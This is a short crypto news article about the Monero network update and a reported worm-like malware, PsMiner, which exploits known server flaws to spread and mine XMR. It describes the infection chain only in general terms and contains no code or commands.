Modular Worm-Like Malware Exploits Known Flaws In Some Servers To Mine Monero (XMR)

Monero (XMR) has recently been updated.

The update was overall a successful one, even if it seemed that there had been some troubles with the hash rate, things would settle eventually.

Monero managed to successfully complete the update which included tweaks to the PoW algorithm for better ASIC-resistance, some changes to mitigate big bang attacks and enhanced transaction homogeneity to improve privacy even more.

The Monero update was a successful one, but it seems that the hash rate of the XMR network has been severely hit.

On Reddit, experts are saying that everything will get back to normal in a few days.

Another Monero exploit

Now, Monero (XMR) is in the news again due to subjects regarding illegal mining.

Bleeping Computer just revealed that there’s a modular malware which has worm-like features and it exploits known flaws in servers which are running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from one server to another and mine for XMR.

“Systemctl.exe, the worm module of the malware named PsMiner by the 360 Total Security researchers, is a Windows binary written in the Go language which bundles all the exploit modules used to hack into vulnerable servers it can find on the Internet,” the online publication reveals.

It seems that besides these exploits, the worm module can also force its way in, anywhere where it finds targets that are using weak or default credentials, and it’s also able to crack user credentials via “an additional brute force password cracking component,” according to Bleeping Computer.

After PSMiner gets into the victim’s system, it executes a PowerShell command which will download a WindowsUpdate.ps1 malicious payload.

This is the malware’s master module designed to drop the XMR miner as part of the final infection stage.

You can find out more details on this malware in Bleeping Computer’s article.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *